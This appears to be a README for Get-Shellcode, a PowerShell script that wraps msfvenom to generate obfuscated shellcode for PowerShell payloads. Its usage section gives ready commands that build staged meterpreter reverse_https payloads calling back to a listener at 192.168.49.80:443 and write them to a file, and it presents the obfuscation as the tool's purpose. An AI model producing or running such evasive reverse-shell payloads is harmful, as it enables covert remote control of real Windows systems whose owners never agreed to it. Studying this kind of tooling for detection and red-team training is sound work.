Obfuscated Msfvenom Shellcode for Powershell

Get-Shellcode is a project that stems from the Invoke-PSObfuscation framework, with the sole purpose of producing obfuscated shellcode generated from msfvenom for PowerShell payloads.

Requirements

This script was built and tested on the following version Kali Linux and PowerShell. The resulting payload is compatible on systems that support PowerShell newer than version 2.0. This script also relies on msfvenom being accessible on the system, which is available by default on Kali.

┌──(kali㉿kali)-[/home/kali]
└─PS> $PSVersionTable

Name                           Value
----                           -----
PSVersion                      7.2.4
PSEdition                      Core
GitCommitId                    7.2.4
OS                             Linux 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07)
Platform                       Unix
PSCompatibleVersions           {1.0, 2.0, 3.0, 4.0…}
PSRemotingProtocolVersion      2.3
SerializationVersion           1.1.0.1
WSManStackVersion              3.0

Usage Examples

To load the script on Kali Linux, open a terminal then run pwsh. With PowerShell now running in your terminal, you can load the script into your current session by dot sourcing the script.

┌──(kali㉿kali)-[~]
└─$ pwsh
PowerShell 7.2.4
Copyright (c) Microsoft Corporation.

https://aka.ms/powershell
Type 'help' to get help.

┌──(kali㉿kali)-[/home/kali]
└─PS> . ./Get-Shellcode.ps1

With the script loaded into our PowerShell session, we need to run the Get-Shellcode function to generate our payload. We are able to generate a payload via two different methods, the default payload and a supplied payload.

Default Payload

The default payload that's generated by this script is a staged meterpreter reverse https shellcode, which only requires us to pass an ip and port. This default payload also sets EXITFUNC to thread. This default is merely out of personal preference and can be changed with ease.

Get-Shellcode -Ip 192.168.49.80 -Port 443

Supplied Payload

The second payload is the supplied payload, where we can pass our own parameters into msfvenom. Keep in mind that this solution is designed for PowerShell payloads so you must include -f ps1. Staged payloads are significantly smaller than a stageless payload so stageless payloads will take more time to be processed. If you also happen to pass a custom payload variable name, it will get obfuscated as well.

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1"

Output to File

Get-Shellcode -Msfvenom "-p windows/x64/meterpreter/reverse_https LHOST=192.168.49.80 LPORT=443 EXITFUNC=thread -f ps1" -OutFile obfuscated.ps1